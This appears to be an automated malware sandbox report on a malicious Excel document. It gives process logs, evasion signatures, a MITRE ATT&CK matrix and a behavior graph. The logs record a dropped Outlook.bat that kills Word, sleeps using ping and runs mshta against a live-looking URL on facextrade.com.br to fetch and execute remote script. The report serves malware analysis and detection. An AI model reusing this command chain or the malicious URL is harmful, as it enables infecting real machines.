Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 8 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387314345.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537773286.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\SysWOW64\Macromed\Flash\activex.vch VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		Path Interception11
Process Injection		1
Masquerading		1
Input Capture		1
Security Software Discovery		Remote Services1
Email Collection		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts121
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools		LSASS Memory11
Remote System Discovery		Remote Desktop Protocol1
Input Capture		Exfiltration Over Bluetooth3
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts23
Exploitation for Client Execution		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager1
System Network Configuration Discovery		SMB/Windows Admin Shares1
Archive Collected Data		Automated Exfiltration3
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)121
Scripting		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer14
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets14
System Information Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 684675 Sample: SecuriteInfo.com.Exploit.Si... Startdate: 16/08/2022 Architecture: WINDOWS Score: 100 43 Multi AV Scanner detection for domain / URL 2->43 45 Antivirus detection for URL or domain 2->45 47 Antivirus / Scanner detection for submitted sample 2->47 49 4 other signatures 2->49 9 EXCEL.EXE 27 23 2->9         started        process3 file4 29 SecuriteInfo.com.E...en3.17149.10211.xls, Composite 9->29 dropped 31 C:\Users\Public\Outlook.bat, ASCII 9->31 dropped 51 Document exploit detected (creates forbidden files) 9->51 13 cmd.exe 1 9->13         started        signatures5 process6 signatures7 53 Uses ping.exe to sleep 13->53 55 Uses ping.exe to check the status of other devices and networks 13->55 16 PING.EXE 1 13->16         started        19 mshta.exe 6 125 13->19         started        21 cmd.exe 1 13->21         started        23 conhost.exe 13->23         started        process8 dnsIp9 33 127.0.0.1 unknown unknown 16->33 35 192.168.2.1 unknown unknown 16->35 37 facextrade.com.br 187.45.240.69, 49743, 49744, 49748 LocawebServicosdeInternetSABR Brazil 19->37 39 www3.l.google.com 142.250.181.238, 443, 49749, 49750 GOOGLEUS United States 19->39 41 4 other IPs or domains 19->41 25 taskkill.exe 1 21->25         started        process10 process11 27 conhost.exe 25->27         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.